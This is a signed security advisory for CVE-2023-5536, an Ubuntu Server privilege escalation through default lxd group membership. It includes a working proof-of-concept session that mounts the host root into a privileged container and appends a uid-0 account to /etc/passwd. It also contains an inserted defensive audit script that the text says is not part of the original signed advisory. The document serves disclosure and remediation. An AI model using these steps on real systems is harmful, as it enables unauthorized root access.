-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID:               SYSS-2023-028
Product:                   Ubuntu Server
Manufacturer:              Canonical Ltd
Affected Version(s):       22.04.03 LTS
Tested Version(s):         22.04.03 LTS
Vulnerability Type:        Incorrect Default Permissions (CWE-276)
Risk Level:                Medium
Solution Status:           Fixed
Manufacturer Notification: 2023-09-28
Solution Date:             2023-12-11
Public Disclosure:         2023-12-11
CVE Reference:             CVE-2023-5536
Author of Advisory:        Tobias Jäger, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Ubuntu Server is a major server operating system.

The manufacturer describes the product as follows (see [1]):

"Ubuntu Server is a version of the Ubuntu operating system designed and
engineered as a backbone for the internet."

Due to incorrect default permissions, it is vulnerable to a local
privilege escalation.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

Ubuntu Server comes with the lxd/lxc tools preinstalled, and the default
operating system user created during installation is a member of the
lxd group by default. Membership in the lxd group allows a user to create
privileged containers and to mount host directories into them, so both
configurations together lead to a local privilege escalation to root.

The default user is also in the sudo group, which allows escalating
privileges if the password of the default user is known. For the
privilege escalation via the lxd group misconfiguration, the password is
not needed.
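The following POSIX shell audit helper is an added example and is not part of the SySS advisory or of Ubuntu's tooling. It reads an /etc/group-style file given as its first argument, lists every account in the lxd group and prints (without executing) the gpasswd commands an administrator would run to remove those accounts, which is the first half of the remediation described in the Solution section. The sample group file is constructed here to mirror the "groups" output in the proof of concept; on a real host the functions are run against /etc/group.

```shell
#!/bin/sh
# Added audit helper (not from the advisory): enumerate lxd group members
# from an /etc/group-style file and print the matching removal commands.

# lxd_members FILE: print one lxd group member per line (empty if none).
lxd_members() {
    awk -F: '$1 == "lxd" {
        n = split($4, m, ",")
        for (i = 1; i <= n; i++) if (m[i] != "") print m[i]
    }' "$1"
}

# lxd_member_count FILE: number of accounts that are in the lxd group.
lxd_member_count() {
    lxd_members "$1" | wc -l | tr -d ' '
}

# lxd_remediation FILE: print, but do not execute, one "gpasswd -d USER lxd"
# per member so an administrator can review the list before applying it.
lxd_remediation() {
    lxd_members "$1" | while read -r u; do
        printf 'gpasswd -d %s lxd\n' "$u"
    done
}

# Constructed sample group file (assumption: mirrors the advisory's
# "lowpriv adm cdrom sudo dip plugdev lxd" output plus a second member).
SAMPLE_GROUP="$(mktemp)"
cat > "$SAMPLE_GROUP" <<'EOF'
root:x:0:
adm:x:4:syslog,lowpriv
sudo:x:27:lowpriv
lxd:x:110:lowpriv,ops
EOF

lxd_member_count "$SAMPLE_GROUP"   # prints 2
lxd_remediation "$SAMPLE_GROUP"    # prints the two gpasswd commands
```

A count of zero is the expected state on a hardened host; any non-empty list means those accounts can reach root through LXD without a password, exactly as the proof of concept shows, and the second half of the fix (multi-user LXD mode, references [4] and [5]) still has to be configured separately.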
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

lowpriv@testserver:~$ whoami
lowpriv
lowpriv@testserver:~$ cat /etc/shadow
cat: /etc/shadow: Permission denied
lowpriv@testserver:~$ groups
lowpriv adm cdrom sudo dip plugdev lxd
lowpriv@testserver:~$ lxc init ubuntu:20.04 container -c security.privileged=true
Creating container
lowpriv@testserver:~$ lxc config device add container hostDisc disk source=/ path=/mnt/root recursive=true
Device hostDisc added to container
lowpriv@testserver:~$ lxc start container
lowpriv@testserver:~$ lxc exec container bash
root@container:~# cd /mnt/root/etc
root@container:/mnt/root/etc# echo 'newroot:$1$QF3RRiqz$KVluZW6Ec33MbChp3jjoH/:0:0:/root:/bin/bash' >> passwd
root@container:/mnt/root/etc# exit
exit
lowpriv@testserver:~$ su newroot
Password:
# id
uid=0(root) gid=0(root) groups=0(root)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Remove users from the lxd group and configure multi-user LXD mode
(see [4] and [5]).

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2023-09-24: Vulnerability discovered
2023-09-28: Vulnerability reported to manufacturer
2023-12-11: Patch released by manufacturer
2023-12-11: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Ubuntu Server
    https://ubuntu.com/server/docs
[2] SySS Security Advisory SYSS-2023-028
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-028.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy
[4] Easy multi-user LXD setup
    https://discourse.ubuntu.com/t/easy-multi-user-lxd-setup/26215/4
[5] Ubuntu CVE-2023-5536
    https://ubuntu.com/security/CVE-2023-5536

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Tobias Jäger of SySS GmbH.
E-Mail: tobias.jaeger@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Tobias_Jaeger.asc
Key ID: 0xABF0CF2F4D0220F9
Key Fingerprint: 5C9F 5312 F37E B9AB E87B 1212 ABF0 CF2F 4D02 20F9

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS
website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEXJ9TEvN+uavoexISq/DPL00CIPkFAmXqx60ACgkQq/DPL00C
IPlwLw//UQLte/mXqEzDu8ryq6Kt0o8W8090qarlv8/AkvXe1R1nyMFkFv1UAUwp
vapUpHdH4HYL7aiDT56BxPWmmrxB4FM7m3R0DjmOTTD4uT27xQ9u1C7ZiHbdkWnA
t7F7Ms4ZLbjGKI6R0qvo4oe1ZOicN4UyxachlY/yCPWf7Wd3hICavb3frhOLjMqi
MuiB6BqnRYsrbPyZBlu0UsObCLV4sl83eh78S2qllbSF/id9WUWkkfBqOkGAAZPL
Ghw2b118Xo2+tdlXn5GkqZR+nW0OHBVFHf8N7QvEh2dL/SHmI3RZvwdXXfRu9map
cnHLuzYVLWvyZ/DbqqcIETbgJfNKURcP533iHJNOMMPNgJJalWH9ba4h8m2PudT4
OGakQNg38ME+qTHqvl+wQQV5NLRP4kz+L/YtnHCPUdw+xwO57U5np/BE+gMesX+S
rSSZVwPf/9b42cqwuJupLUMwUVECwWLr6H84OJEjPZune/5ZS/ABbJbND/P5bG1I
25qNVhO09o+Lgw+8wSydU0cTds7oRGXO0Bppek6Y/6Uj3AeJWcDMdbbFu+/0CS0X
EW953C9ctfhEra3eup/Dlk4LFouqn0Z84XQj6KEl27nNyB9fyFWNUJn7oCBsu9I2
KleOLzt7hea3sLC8iuNq/1c+Xn74cOoyi7QchwpuibNwlBr4Kp8=
=mQNL
-----END PGP SIGNATURE-----